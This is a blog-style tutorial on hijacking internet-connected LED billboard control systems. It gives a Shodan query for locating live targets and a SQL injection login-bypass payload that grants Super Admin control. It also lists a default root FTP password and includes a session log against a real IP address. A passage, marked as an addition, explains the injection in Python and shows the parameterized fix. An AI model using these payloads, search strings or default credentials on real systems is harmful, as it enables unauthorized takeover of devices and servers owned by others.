Hacking Digital Billboards

[Image: HACKED-BOARD]


About a month ago a member of Hack Forums called Gangs posted a tutorial on how to hack digital billboards with a simple SQL injection. I thought it can't be that simple and tested it out myself. To my surprise, even in 2016 SQL injection is still a valid attack vector on sites connected to the internet; I'm guessing that's why it's still in the OWASP (Open Web Application Security Project) Top 10.

The original post on Hack Forums is here: http://hackforums.net/showthread.php?tid=5277277

First of all you need to find some vulnerable billboards connected to the internet. To do this you need to create a free account at https://www.shodan.io/

Shodan is a search engine that lets the user find specific types of computers (Web Cams, routers, servers, etc.) connected to the internet using a variety of filters.

Once you're registered at Shodan you can use the search feature to find our vulnerable billboards.

In the search box type title:"lednet live system" as pictured below

[Image: Shodan search for "lednet live system"]


and you should be presented with a list of results like this one in Egypt.


[Image: ledlivesite]

When you click the link in Shodan it should take you directly to the site hosting the billboard system and you will be presented with a login.

[Image: ledlivelogin]

So how to hack it? Well, the Username parameter is vulnerable to SQL injection…

So to log in, paste this into the username field…

-1558" OR 9005=9005 AND "UxGI"="UxGI

and anything in the password input. Now click login!

[Image: ledliveSQLI]


Once logged in, take a look at the top right corner: you should now be logged in as a Super Admin.

[Image: ledlivesuperadmin]

From here you have full access to the digital billboard and can control everything from what shows on it to the display and power settings, even enabling the built-in WiFi and giving everyone free WiFi.
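To show why the payload above logs you in, here is an added example (not code from the post or from the billboard vendor) of the two ways a login query can be written. It assumes a hypothetical users table and, for the vulnerable version, that the username is the last condition in the WHERE clause: since AND binds tighter than OR, an injected "OR <always true>" at the end makes the whole clause true whatever the password is, and the application takes the first row it gets back, which here is the admin. The demo runs on SQLite, which quotes strings with single quotes, so the payload's double quotes are swapped for single quotes; the shape is otherwise identical. The parameterized version sends the same input as data rather than SQL and is the fix the vendor should have shipped.

```python
import sqlite3

# Constructed demo data standing in for the board's user table (hypothetical schema).
# Plaintext passwords are only to keep the demo short.
USERS = [("admin", "correct-horse", "Super Admin"), ("ops", "s3cret", "Operator")]

# The payload from the post, with the string delimiter swapped from " to ' because
# SQLite (used here so the demo runs anywhere) quotes strings with single quotes.
TAUTOLOGY_PAYLOAD = "-1558' OR 9005=9005 AND 'UxGI'='UxGI"


def make_db():
    """In-memory SQLite database populated with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string formatting: the injectable pattern.

    Assumed clause order: password first, username last. With the payload the
    clause becomes (password='x' AND username='-1558') OR (9005=9005 AND 'UxGI'='UxGI'),
    which is true for every row, so the first row (admin) is returned.
    Returns the role of the first matching row, or None.
    """
    sql = ("SELECT role FROM users WHERE password = '%s' AND username = '%s'"
           % (password, username))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same logic with bound parameters: the driver passes the payload as a value,
    so it can only ever be compared against the username column, never parsed as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE password = ? AND username = ?",
        (password, username),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both login variants with real credentials and with the payload."""
    conn = make_db()
    return {
        "vuln_real_creds": login_vulnerable(conn, "ops", "s3cret"),
        "vuln_payload": login_vulnerable(conn, TAUTOLOGY_PAYLOAD, "anything"),
        "param_real_creds": login_parameterized(conn, "ops", "s3cret"),
        "param_payload": login_parameterized(conn, TAUTOLOGY_PAYLOAD, "anything"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running it prints Super Admin for the vulnerable login fed the payload and None for the parameterized one; both still accept the real operator credentials. The clause order matters only for the vulnerable version: if the username check came first, the injected OR would be bound to the password check and the bypass would need a different payload, which is exactly why string-built queries are not fixable by shuffling conditions, only by parameterizing them.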

But wait that’s not all!!!!

There is another vulnerability in these billboards: a default root password. You can get root FTP access to all of these billboards with the details below…

Username: root
Password: 111111


$ ftp 186.206.188.175
 Connected to 186.206.188.175.
 220 Welcome to blah FTP service.
 Name (186.206.188.175): root
 331 Please specify the password.
 Password:
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> cd /
 250 Directory successfully changed.
 ftp> passive
 Passive mode on.
 ftp> ls
 229 Entering Extended Passive Mode (|||41314|).
 150 Here comes the directory listing.
 drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
 drwxr-xr-x 7 0 0 0 May 21 18:08 dev
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
 drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
 drwxr-xr-x 1 0 0 36 Jan 01 1970 home
 drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
 lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
 drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
 drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
 dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
 drwxr-xr-x 1 0 0 116 Jan 01 1970 root
 drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
 drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
 drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
 drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
 drwxr-xr-x 3 0 0 672 Jan 01 1970 var
 drwxr-xr-x 4 0 0 288 Jan 01 1970 www
 226 Directory send OK.
 ftp>

You now have root access to the entire server.

I do think it's a poor show on the part of the company that makes and sells this product not to have done proper security testing before going to market, which would have picked up a simple SQL injection, never mind a default root password on all your devices, tut tut… but I bet there are other types of billboards with the same sort of issues.
